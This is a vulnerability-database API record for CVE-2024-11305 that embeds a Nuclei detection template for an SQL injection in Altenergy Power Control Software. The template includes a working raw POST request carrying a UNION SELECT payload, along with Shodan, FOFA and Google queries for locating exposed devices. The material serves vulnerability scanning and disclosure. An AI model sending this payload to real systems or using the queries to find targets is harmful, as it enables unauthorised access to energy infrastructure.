{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-11305/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-11305/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-11305/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-11305/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-11305/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-11305"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-11305"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2024/CVE-2024-11305.yaml",
    "nuclei_template_severity": "medium",
    "nuclei_template_yaml": "id: CVE-2024-11305\n\ninfo:\n  name: Altenergy Power Control Software - SQL Injection\n  author: s4e-io\n  severity: medium\n  description: |\n    A vulnerability classified as critical was found in Altenergy Power Control Software up to 20241108. This vulnerability affects the function get_status_zigbee of the file /index.php/display/status_zigbee. The manipulation of the argument date leads to sql injection. The attack can be initiated remotely.\n  impact: |\n    Authenticated attackers can execute SQL injection through the date parameter in the status_zigbee function to extract sensitive power system data including energy metrics and device configurations.\n  remediation: |\n    Validate and sanitize all user inputs before processing them in SQL queries. Use parameterized queries or prepared statements to prevent SQL injection attacks.\n  reference:\n    - https://blog.csdn.net/ZeroDay001/article/details/143878599\n    - https://cn-sec.com/archives/3447233.html\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-11305\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L\n    cvss-score: 6.3\n    cve-id: CVE-2024-11305\n    cwe-id: CWE-74\n    epss-score: 0.0367\n    epss-percentile: 0.89219\n  metadata:\n    max-request: 1\n    vendor: apsystems\n    product: energy_communication_unit_firmware\n    shodan-query: http.title:\"altenergy power control software\"\n    fofa-query: title=\"altenergy power control software\"\n    google-query: intitle:\"altenergy power control software\"\n  tags: cve,cve2024,altenergy,iot,sqli,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /index.php/display/status_zigbee HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        date=2024-11-06%' UNION ALL SELECT 11,CHAR(113)||CHAR(75,101,86,69,115,83,113,89,100,122,121,102,83,83,113,86,84,112,100,103,69,75,80,117,88,109,83,105,89,116,110,120,76,84,73,109,115,100,83,107)||CHAR(113,118,98,98,113),11-- wPIB\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_all(body, \"Status(ZigBee)\", \"qKeVEsSqYdzyfSSqVTpdgEKPuXmSiYtnxLTImsdSkqvbbq\")'\n          - 'contains(content_type, \"text/html\")'\n          - \"status_code == 200\"\n        condition: and\n# digest: 490a0046304402202fbf141512a8c2f9d4b7916e491fa28f2f791c0fa01cfe9414b99d4093bb8e09022019a06594f898c72d4c336265a44a323d36d1cf5324aca9a0b90c5606a7569b93:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2024-11305"
}